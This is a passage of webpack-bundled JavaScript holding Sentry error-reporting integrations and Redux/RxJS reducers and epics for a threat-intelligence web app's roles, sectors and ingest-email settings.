                        if (xhr.__sentry_own_request__) {
                            return;
                        }
                        try {
                            // touching statusCode in some platforms throws
                            // an exception
                            if (xhr.__sentry_xhr__) {
                                xhr.__sentry_xhr__.status_code = xhr.status;
                            }
                        }
                        catch (e) {
                            /* do nothing */
                        }
                        Breadcrumbs.addBreadcrumb({
                            category: 'xhr',
                            data: xhr.__sentry_xhr__,
                            type: 'http',
                        }, {
                            xhr: xhr,
                        });
                    }
                }
                ['onload', 'onerror', 'onprogress'].forEach(function (prop) {
                    wrapProp(prop, xhr);
                });
                if ('onreadystatechange' in xhr && typeof xhr.onreadystatechange === 'function') {
                    Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["g" /* fill */])(xhr, 'onreadystatechange', function (original) {
                        return Object(__WEBPACK_IMPORTED_MODULE_4__helpers__["d" /* wrap */])(original, {
                            mechanism: {
                                data: {
                                    function: 'onreadystatechange',
                                    handler: (original && original.name) || '<anonymous>',
                                },
                                handled: true,
                                type: 'instrument',
                            },
                        }, onreadystatechangeHandler);
                    });
                }
                else {
                    // if onreadystatechange wasn't actually set by the page on this xhr, we
                    // are free to set our own and capture the breadcrumb
                    xhr.onreadystatechange = onreadystatechangeHandler;
                }
                return originalSend.apply(this, args);
            };
        });
    };
    /**
     * Helper that checks if integration is enabled on the client.
     * @param breadcrumb Breadcrumb
     * @param hint BreadcrumbHint
     */
    Breadcrumbs.addBreadcrumb = function (breadcrumb, hint) {
        if (Object(__WEBPACK_IMPORTED_MODULE_1__sentry_core__["h" /* getCurrentHub */])().getIntegration(Breadcrumbs)) {
            Object(__WEBPACK_IMPORTED_MODULE_1__sentry_core__["h" /* getCurrentHub */])().addBreadcrumb(breadcrumb, hint);
        }
    };
    /**
     * Instrument browser built-ins w/ breadcrumb capturing
     *  - Console API
     *  - DOM API (click/typing)
     *  - XMLHttpRequest API
     *  - Fetch API
     *  - History API
     */
    Breadcrumbs.prototype.setupOnce = function () {
        if (this._options.console) {
            this._instrumentConsole();
        }
        if (this._options.dom) {
            this._instrumentDOM();
        }
        if (this._options.xhr) {
            this._instrumentXHR();
        }
        if (this._options.fetch) {
            this._instrumentFetch();
        }
        if (this._options.history) {
            this._instrumentHistory();
        }
    };
    /**
     * @inheritDoc
     */
    Breadcrumbs.id = 'Breadcrumbs';
    return Breadcrumbs;
}());

/** JSDoc */
function addSentryBreadcrumb(serializedData) {
    // There's always something that can go wrong with deserialization...
    try {
        var event_1 = JSON.parse(serializedData);
        Breadcrumbs.addBreadcrumb({
            category: 'sentry',
            event_id: event_1.event_id,
            level: event_1.level || __WEBPACK_IMPORTED_MODULE_2__sentry_types__["a" /* Severity */].fromString('error'),
            message: Object(__WEBPACK_IMPORTED_MODULE_3__sentry_utils__["h" /* getEventDescription */])(event_1),
        }, {
            event: event_1,
        });
    }
    catch (_oO) {
        __WEBPACK_IMPORTED_MODULE_3__sentry_utils__["t" /* logger */].error('Error while adding sentry type breadcrumb');
    }
}
//# sourceMappingURL=breadcrumbs.js.map

/***/ }),
/* 3240 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return LinkedErrors; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_tslib__ = __webpack_require__(64);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__sentry_core__ = __webpack_require__(136);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__parsers__ = __webpack_require__(771);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__tracekit__ = __webpack_require__(515);




var DEFAULT_KEY = 'cause';
var DEFAULT_LIMIT = 5;
/** Adds SDK info to an event. */
var LinkedErrors = /** @class */ (function () {
    /**
     * @inheritDoc
     */
    function LinkedErrors(options) {
        if (options === void 0) { options = {}; }
        /**
         * @inheritDoc
         */
        this.name = LinkedErrors.id;
        this._key = options.key || DEFAULT_KEY;
        this._limit = options.limit || DEFAULT_LIMIT;
    }
    /**
     * @inheritDoc
     */
    LinkedErrors.prototype.setupOnce = function () {
        Object(__WEBPACK_IMPORTED_MODULE_1__sentry_core__["e" /* addGlobalEventProcessor */])(function (event, hint) {
            var self = Object(__WEBPACK_IMPORTED_MODULE_1__sentry_core__["h" /* getCurrentHub */])().getIntegration(LinkedErrors);
            if (self) {
                return self._handler(event, hint);
            }
            return event;
        });
    };
    /**
     * @inheritDoc
     */
    LinkedErrors.prototype._handler = function (event, hint) {
        if (!event.exception || !event.exception.values || !hint || !(hint.originalException instanceof Error)) {
            return event;
        }
        var linkedErrors = this._walkErrorTree(hint.originalException, this._key);
        event.exception.values = __WEBPACK_IMPORTED_MODULE_0_tslib__["f" /* __spread */](linkedErrors, event.exception.values);
        return event;
    };
    /**
     * @inheritDoc
     */
    LinkedErrors.prototype._walkErrorTree = function (error, key, stack) {
        if (stack === void 0) { stack = []; }
        if (!(error[key] instanceof Error) || stack.length + 1 >= this._limit) {
            return stack;
        }
        var stacktrace = Object(__WEBPACK_IMPORTED_MODULE_3__tracekit__["a" /* _computeStackTrace */])(error[key]);
        var exception = Object(__WEBPACK_IMPORTED_MODULE_2__parsers__["c" /* exceptionFromStacktrace */])(stacktrace);
        return this._walkErrorTree(error[key], key, __WEBPACK_IMPORTED_MODULE_0_tslib__["f" /* __spread */]([exception], stack));
    };
    /**
     * @inheritDoc
     */
    LinkedErrors.id = 'LinkedErrors';
    return LinkedErrors;
}());

//# sourceMappingURL=linkederrors.js.map

/***/ }),
/* 3241 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return UserAgent; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_tslib__ = __webpack_require__(64);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__sentry_core__ = __webpack_require__(136);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__sentry_utils__ = __webpack_require__(53);



var global = Object(__WEBPACK_IMPORTED_MODULE_2__sentry_utils__["i" /* getGlobalObject */])();
/** UserAgent */
var UserAgent = /** @class */ (function () {
    function UserAgent() {
        /**
         * @inheritDoc
         */
        this.name = UserAgent.id;
    }
    /**
     * @inheritDoc
     */
    UserAgent.prototype.setupOnce = function () {
        Object(__WEBPACK_IMPORTED_MODULE_1__sentry_core__["e" /* addGlobalEventProcessor */])(function (event) {
            if (Object(__WEBPACK_IMPORTED_MODULE_1__sentry_core__["h" /* getCurrentHub */])().getIntegration(UserAgent)) {
                if (!global.navigator || !global.location) {
                    return event;
                }
                // HTTP Interface: https://docs.sentry.io/clientdev/interfaces/http/?platform=javascript
                var request = event.request || {};
                request.url = request.url || global.location.href;
                request.headers = request.headers || {};
                request.headers['User-Agent'] = global.navigator.userAgent;
                return __WEBPACK_IMPORTED_MODULE_0_tslib__["a" /* __assign */]({}, event, { request: request });
            }
            return event;
        });
    };
    /**
     * @inheritDoc
     */
    UserAgent.id = 'UserAgent';
    return UserAgent;
}());

//# sourceMappingURL=useragent.js.map

/***/ }),
/* 3242 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "scroll", function() { return scroll; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "detailPanel", function() { return detailPanel; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);


var scroll = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['display', 'scroll']);

var detailPanel = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['display', 'detailPanel']);

/***/ }),
/* 3243 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__types__ = __webpack_require__(3244);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__action_types__ = __webpack_require__(1430);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_modules_constellation_action_types__ = __webpack_require__(143);







// State for scroll positioning in the Explore View for Reports, Indicators, and Search Results
var scroll = function scroll() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types__["b" /* STORE_SCROLL_POSITION */]:
      return state.set(payload.key, payload.value);
    default:
      return state;
  }
};

// State for display options of the Details Panel in Analysis View
var detailPanel = function detailPanel() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_2__types__["a" /* detailPanelRecord */])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types__["a" /* SET_DETAIL_PANEL_OPTIONS */]:
      return state.merge(payload);
    case __WEBPACK_IMPORTED_MODULE_4_modules_constellation_action_types__["I" /* SET_ACTIVE_NOTE */]:
      return state.merge({ detailType: 'notes' });
    default:
      return state;
  }
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_1_redux_immutable__["combineReducers"])({
  scroll: scroll,
  detailPanel: detailPanel
}));

/***/ }),
/* 3244 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return detailPanelRecord; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);


var detailPanelRecord = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  detailType: 'content',
  showExtendedContent: false
});

/***/ }),
/* 3245 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetch", function() { return fetch; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__action_types_js__ = __webpack_require__(774);


/**
 * Fetch all ROLES
 */
var fetch = function fetch() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["a" /* FETCH */]
  };
};

/***/ }),
/* 3246 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export roles */
/* unused harmony export loading */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__action_types_js__ = __webpack_require__(774);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__types_js__ = __webpack_require__(773);
var _slicedToArray = function () { function sliceIterator(arr, i) { var _arr = []; var _n = true; var _d = false; var _e = undefined; try { for (var _i = arr[Symbol.iterator](), _s; !(_n = (_s = _i.next()).done); _n = true) { _arr.push(_s.value); if (i && _arr.length === i) break; } } catch (err) { _d = true; _e = err; } finally { try { if (!_n && _i["return"]) _i["return"](); } finally { if (_d) throw _e; } } return _arr; } return function (arr, i) { if (Array.isArray(arr)) { return arr; } else if (Symbol.iterator in Object(arr)) { return sliceIterator(arr, i); } else { throw new TypeError("Invalid attempt to destructure non-iterable instance"); } }; }();










var listToOrderedMap = function listToOrderedMap(list) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(list).toOrderedMap().mapEntries(function (_ref) {
    var _ref2 = _slicedToArray(_ref, 2),
        k = _ref2[0],
        v = _ref2[1];

    return [v.get('name'), Object(__WEBPACK_IMPORTED_MODULE_3__types_js__["a" /* Role */])(v)];
  });
};

var roles = function roles() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["c" /* FETCH_SUCCESS */]:
      return listToOrderedMap(payload);
    default:
      return state;
  }
};

var loading = function loading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["a" /* FETCH */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["c" /* FETCH_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["b" /* FETCH_FAILURE */]:
      return false;
    default:
      return state;
  }
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__["combineReducers"])({
  roles: roles,
  loading: loading
}));

/***/ }),
/* 3247 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export ENDPOINT */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__action_types_js__ = __webpack_require__(774);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_modules_app_action_types_js__ = __webpack_require__(134);





var debug = __WEBPACK_IMPORTED_MODULE_2_debug___default()('app:modules:roles:epics'); // eslint-disable-line no-unused-vars




var ENDPOINT = '/services/roles';

// TODO: Throwaway typings are in here to simply get this out the door without
// taking the time to accurately type it
var fetchEpic = function fetchEpic(action$, store, _ref) {
  var ajax = _ref.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_3__action_types_js__["a" /* FETCH */]).switchMap(function () {
    return ajax.get(ENDPOINT).map(function (_ref2) {
      var response = _ref2.response;
      return {
        type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["c" /* FETCH_SUCCESS */],
        payload: response
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["b" /* FETCH_FAILURE */],
        error: true,
        payload: err,
        meta: {
          alert: { type: 'error', text: 'Roles could not be fetched.' }
        }
      });
    });
  });
};

var initializeEpic = function initializeEpic(action$, store, _ref3) {
  var ajax = _ref3.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_4_modules_app_action_types_js__["INITIALIZE"]).mergeMap(function () {
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
      type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["a" /* FETCH */]
    });
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_1_redux_observable__["combineEpics"])(fetchEpic, initializeEpic));

/***/ }),
/* 3248 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetch", function() { return fetch; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__action_types_js__ = __webpack_require__(775);


/**
 * Fetch all sectors
 */
var fetch = function fetch() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["a" /* FETCH */]
  };
};

/***/ }),
/* 3249 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export sectors */
/* unused harmony export loading */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__action_types_js__ = __webpack_require__(775);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__types_js__ = __webpack_require__(3250);








/* **************************************************************************
 * Enclaves
 * *************************************************************************/
var listToOrderedMap = function listToOrderedMap(list) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(list).toOrderedMap().map(__WEBPACK_IMPORTED_MODULE_3__types_js__["a" /* Sector */]).mapKeys(function (k, v) {
    return v.get('id');
  });
};

// TODO: Properly type this action
var sectors = function sectors() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["c" /* FETCH_SUCCESS */]:
      return listToOrderedMap(payload);
    default:
      return state;
  }
};

var loading = function loading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["a" /* FETCH */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["c" /* FETCH_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["b" /* FETCH_FAILURE */]:
      return false;
    default:
      return state;
  }
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__["combineReducers"])({
  sectors: sectors,
  loading: loading
}));

/***/ }),
/* 3250 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return Sector; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);


var Sector = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  id: null, // Number
  label: '',
  name: ''
});

/***/ }),
/* 3251 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export endpoint */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__action_types_js__ = __webpack_require__(775);




var debug = __WEBPACK_IMPORTED_MODULE_2_debug___default()('app:modules:sectors:epics'); // eslint-disable-line no-unused-vars



var endpoint = '/services/sectors';

var fetchEpic = function fetchEpic(action$, store, _ref) {
  var ajax = _ref.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_3__action_types_js__["a" /* FETCH */]).switchMap(function () {
    return ajax.get(endpoint).map(function (_ref2) {
      var response = _ref2.response;
      return {
        type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["c" /* FETCH_SUCCESS */],
        payload: response
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["b" /* FETCH_FAILURE */],
        error: true,
        payload: err,
        meta: {
          alert: { type: 'error', text: 'Sectors could not be fetched.' }
        }
      });
    });
  });
};

/* harmony default export */ __webpack_exports__["a"] = (fetchEpic);

/***/ }),
/* 3252 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_router__ = __webpack_require__(98);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_querystring__ = __webpack_require__(119);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_querystring___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_querystring__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_redux_form_immutable__ = __webpack_require__(180);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_redux_form_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_6_redux_form_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_8_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9__action_types__ = __webpack_require__(776);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_modules_profile__ = __webpack_require__(140);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11_modules_insights__ = __webpack_require__(572);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12_modules_insights_action_types__ = __webpack_require__(358);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13__getters_js__ = __webpack_require__(777);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_14__actions_js__ = __webpack_require__(1432);











var debug = __WEBPACK_IMPORTED_MODULE_8_debug___default()('app:modules:settings:epics'); // eslint-disable-line no-unused-vars








var EMAIL_SETTINGS_ENDPOINT = '/services/ingest-emails';

var navigateEpic = function navigateEpic(action$) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_9__action_types__["t" /* SET_ENCLAVE_MENU */]).filter(Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["prop"])('payload')).do(function () {
    return __WEBPACK_IMPORTED_MODULE_1_react_router__["browserHistory"].push('/settings/profile');
  }).delay(500).do(function () {
    var el = document.getElementById('DefaultEnclaveSettings');
    if (el) el.scrollIntoView();
  }).ignoreElements();
};

var defaultEnclaveSelectionEpic = function defaultEnclaveSelectionEpic(action$, store, _ref) {
  var ajax = _ref.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_9__action_types__["s" /* SELECT_DEFAULT_ENCLAVE */]).mergeMap(function (_ref2) {
    var _ref2$payload = _ref2.payload,
        id = _ref2$payload.id,
        name = _ref2$payload.name;

    var updatedPreferences = {
      defaultEnclaveGuid: id
    };
    // Update profile, re-fetch insights data, and save default enclave
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_12_modules_insights_action_types__["k" /* SAVE_DEFAULT_ENCLAVE */], payload: { id: id, name: name } }, __WEBPACK_IMPORTED_MODULE_10_modules_profile__["actions"].updatePreferences(updatedPreferences)]);
  });
};

var IngestEmail = Object(__WEBPACK_IMPORTED_MODULE_7_immutable__["Record"])({
  created: null,
  updated: null,
  createdBy: null,
  updatedBy: null,
  guid: null,
  ingestEmail: null,
  enclaveGuid: null,
  companyGuid: null,
  fromEmails: [],
  subjectPrefixes: [],
  groupThreads: true,
  purgeSubjectPrefix: false,
  enableRedaction: false,

  enclave: null // This doesn't come from the server... we merge it in to make data rendering easier
});

var fromList = Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["pipe"])(Object(__WEBPACK_IMPORTED_MODULE_4_trustar_utils__["listToOrderedMap"])('guid'), Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["map"])(IngestEmail));

var fetchIngestEmailsEpic = function fetchIngestEmailsEpic(action$, store, _ref3) {
  var ajax = _ref3.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_9__action_types__["m" /* FETCH_INGEST_EMAILS */]).map(Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["prop"])('payload')).mergeMap(function (params) {
    var url = EMAIL_SETTINGS_ENDPOINT + '?' + Object(__WEBPACK_IMPORTED_MODULE_5_querystring__["stringify"])(params);
    return ajax.get(url).map(Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["prop"])('response')).map(function (page) {
      var payload = fromList(page.items);
      return {
        type: __WEBPACK_IMPORTED_MODULE_9__action_types__["o" /* FETCH_INGEST_EMAILS_SUCCESS */],
        payload: payload,
        meta: {
          startPage: params.startPage,
          hasNext: page.hasNext,
          total: page.totalElements
        }
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_9__action_types__["n" /* FETCH_INGEST_EMAILS_FAILURE */],
        error: true,
        payload: err,
        meta: {
          alert: { type: 'error', text: 'Could not fetch ingest emails.' }
        }
      });
    });
  });
};

var deleteIngestEmailEpic = function deleteIngestEmailEpic(action$, store, _ref4) {
  var ajax = _ref4.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_9__action_types__["i" /* DELETE_INGEST_EMAIL */]).map(Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["prop"])('payload')).map(Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["prop"])('guid')).mergeMap(function (guid) {
    var url = EMAIL_SETTINGS_ENDPOINT + '/' + guid;
    return ajax.delete(url).map(Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["prop"])('response')).map(Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["prop"])('guid')).map(function (guid) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_9__action_types__["k" /* DELETE_INGEST_EMAIL_SUCCESS */],
        payload: guid,
        meta: {
          alert: {
            type: 'success',
            text: 'Successfully deleted Enclave Inbox.'
          }
        }
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_9__action_types__["j" /* DELETE_INGEST_EMAIL_FAILURE */],
        error: true,
        payload: err,
        meta: {
          alert: {
            type: 'error',
            text: Object(__WEBPACK_IMPORTED_MODULE_4_trustar_utils__["parseServerErrorMessage"])(err, 'Could not fetch ingest emails.')
          }
        }
      });
    });
  });
};

var refetchIngestEmailsEpic = function refetchIngestEmailsEpic(action$, store) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_9__action_types__["r" /* SAVE_EMAIL_SETTINGS_SUCCESS */]).map(function () {
    return Object(__WEBPACK_IMPORTED_MODULE_13__getters_js__["emailOptions"])(store.getState());
  }).map(__WEBPACK_IMPORTED_MODULE_4_trustar_utils__["getQueryParams"]).map(__WEBPACK_IMPORTED_MODULE_14__actions_js__["fetchIngestEmails"]);
};

/* Submit email settings form values to server */
var saveEmailSettingsEpic = function saveEmailSettingsEpic(action$, store, _ref5) {
  var ajax = _ref5.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_9__action_types__["p" /* SAVE_EMAIL_SETTINGS */]).map(function (_ref6) {
    var formValues = _ref6.payload;

    return formValues.update('fromEmails', function (a) {
      return a.map(function (b) {
        return b.first();
      }).filter(function (c) {
        return !!c;
      });
    }).update('subjectPrefixes', function (a) {
      return a.map(function (b) {
        return b.first();
      });
    }).update('enclaveGuid', function (a) {
      return typeof a === 'string' ? a : a.value;
    }).update('ingestEmail', function (x) {
      return x + '@enclave.trustar.co';
    }).toJS();
  }).mergeMap(function (values) {
    var req$ = values.guid ? ajax.putJSON(EMAIL_SETTINGS_ENDPOINT + '/' + values.guid, values) : ajax.postJSON(EMAIL_SETTINGS_ENDPOINT, values);

    return req$.map(function () {
      return {
        type: __WEBPACK_IMPORTED_MODULE_9__action_types__["r" /* SAVE_EMAIL_SETTINGS_SUCCESS */],
        meta: {
          alert: { type: 'success', text: 'Enclave Inbox saved. It may take up to two minutes to be available.' }
        }
      };
    }).mergeMap(function (action) {
      return [action, Object(__WEBPACK_IMPORTED_MODULE_6_redux_form_immutable__["reset"])('createEmailIngest'), // Reset the create form if present
      Object(__WEBPACK_IMPORTED_MODULE_6_redux_form_immutable__["reset"])('editEmailIngest')];
    } // Reset the edit form if present
    ).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_9__action_types__["q" /* SAVE_EMAIL_SETTINGS_FAILURE */],
        payload: err,
        error: true,
        meta: {
          alert: {
